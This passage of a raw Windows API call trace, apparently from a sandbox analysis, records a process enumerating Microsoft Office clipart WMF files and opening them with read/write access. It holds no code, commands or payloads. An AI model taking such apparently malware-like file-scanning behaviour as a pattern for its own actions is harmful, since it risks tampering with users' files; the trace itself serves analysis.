out: lpNewFilePointer=0x0) returned 1 [0102.618] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.618] CloseHandle (hObject=0x33c) returned 1 [0102.619] AreFileApisANSI () returned 1 [0102.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0102.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 69 [0102.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00252_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.619] GetFileType (hFile=0x33c) returned 0x1 [0102.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0102.619] CloseHandle (hObject=0x33c) returned 1 [0102.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0102.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0102.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0102.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0102.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.621] AreFileApisANSI () returned 1 [0102.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0102.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 69 [0102.621] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00252_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcdbb058, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1264)) returned 1 [0102.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0102.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0102.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0102.621] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.621] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.621] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd685b3d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6c8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00254_.WMF", cAlternateFileName="")) returned 1 [0102.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0102.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0102.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0102.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0102.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0102.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0102.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0102.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0102.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0102.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0102.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0102.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.622] AreFileApisANSI () returned 1 [0102.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0102.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0102.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0102.622] AreFileApisANSI () returned 1 [0102.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0102.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 69 [0102.623] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00254_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.623] GetFileType (hFile=0x33c) returned 0x1 [0102.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.624] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.624] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.624] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.624] CloseHandle (hObject=0x33c) returned 1 [0102.626] AreFileApisANSI () returned 1 [0102.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0102.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 69 [0102.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00254_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.626] GetFileType (hFile=0x33c) returned 0x1 [0102.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0102.627] CloseHandle (hObject=0x33c) returned 1 [0102.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0102.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0102.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0102.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0102.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0102.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0102.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0102.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0102.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.628] AreFileApisANSI () returned 1 [0102.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0102.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 69 [0102.628] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00254_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd685b3d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6c8)) returned 1 [0102.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0102.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0102.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0102.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.628] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd65f8ed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30c2, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00261_.WMF", cAlternateFileName="")) returned 1 [0102.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0102.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0102.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0102.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0102.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0102.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0102.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0102.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0102.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.629] AreFileApisANSI () returned 1 